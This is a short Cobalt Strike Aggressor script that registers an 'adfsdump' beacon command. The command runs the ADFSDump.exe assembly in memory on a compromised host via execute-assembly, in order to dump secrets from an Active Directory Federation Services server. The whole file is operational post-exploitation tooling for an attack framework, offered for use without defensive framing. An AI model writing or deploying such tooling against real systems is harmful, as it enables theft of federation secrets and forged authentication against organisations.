beacon_command_register("adfsdump", "A C# tool to dump all sorts of goodies from AD FS",
	"Usage: adfsdump [arguments]\n\n" .
	"Uses execute-assembly to run the assembly and takes given arguments\n");
alias adfsdump{
	local('$bid $asm $desc @args $argu');
	$bid = $1;
	$asm = "/opt/cobalt_strike_extension_kit/exe/ADFSDump.exe";
	$desc = "ADFSDump";
	@args = @_;
	remove(@args, $bid);
	$argu = join(' ', @args);
	if ($argu eq ""){
		blog2($bid, "" . dstamp(ticks()) . " Executing $desc");
	}
	else{
		blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'");
	}
	bexecute_assembly!($bid, $asm, $argu);
}
